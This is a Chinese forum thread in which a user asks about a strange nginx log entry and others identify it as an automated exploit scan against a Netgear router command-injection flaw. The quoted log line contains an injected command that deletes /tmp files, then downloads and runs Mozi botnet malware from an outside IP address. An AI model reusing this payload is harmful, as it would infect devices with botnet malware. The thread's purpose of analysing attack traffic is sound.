nginx 莫名奇妙的日志，请大家分析一下。

调查员 · 发表于 2024-9-8 12:25:17

系统是刚装几天的，就装了 nginx 反代一个docker容器，不是80端口

但是nginx就老发现一些奇怪的日志。

比如下面这个。居然还有 “rm+-rf” 这种命令

117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"

larry · 发表于 2024-9-8 12:44:00

调查员发表于 2024-9-8 12:28
不会吧，用访问不存在网页的方式，也能试漏洞？

他不访问怎么知道不存在?

loverhoc · 发表于 2024-9-8 12:26:42

别人在试漏洞，执行命令

调查员 · 发表于 2024-9-8 12:28:10

loverhoc 发表于 2024-9-8 12:26
别人在试漏洞，执行命令

不会吧，用访问不存在网页的方式，也能试漏洞？

wps · 发表于 2024-9-8 12:30:17

这是一个针对路由器的漏洞CNNVD-201306-024

调查员 · 发表于 2024-9-8 12:31:26

wps 发表于 2024-9-8 12:30
这是一个针对路由器的漏洞CNNVD-201306-024

看来大家的路由器，80端口真的不要轻易打开。

调查员 · 发表于 2024-9-8 12:35:14

印度人在干坏事。

icon · 发表于 2024-9-8 12:50:52

看这些你不是不是觉得太无聊了？

fsl · 发表于 2024-9-9 10:32:53

loc 竟然真有萌新

Sage · 发表于 2024-9-9 11:15:31

调查员发表于 2024-9-8 12:28
不会吧，用访问不存在网页的方式，也能试漏洞？

访问到了说明存在，访问不到说明不存在，就这么一个一个试

		自动登录	找回密码
密码			注册